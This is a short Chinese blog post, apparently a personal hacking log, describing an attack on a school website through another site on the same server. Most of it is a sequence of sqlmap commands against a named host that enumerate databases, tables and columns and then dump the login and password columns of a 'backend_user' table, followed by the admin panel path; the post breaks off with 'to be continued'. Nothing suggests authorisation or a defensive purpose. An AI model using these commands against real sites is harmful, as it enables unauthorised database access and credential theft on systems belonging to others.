旁注某学校官网

官网扫了一圈没什么发现,旁注发现一个sql注入;

使用工具进行检索信息

sqlmap.py -u http://yio.me/view_product.asp?proid=21 –dbs

获取数据库

 

 

sqlmap.py -u http://www.yio.me/view_product.asp?proid=21 -D chinabella –tables(window下)

获取获取表

 

得到很多表。继续

sqlmap.py -u http://www.yio.me/view_product.asp?proid=21 -D chinabella  -T backend_user –columns

获取列

 

sqlmap.py -u http://www.yio.me/view_product.asp?proid=21 -D chinabella -T backend_user -C login,password –dump

跑出密码

 

后台地址sys

 

 

 

时间太久了待续。。

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注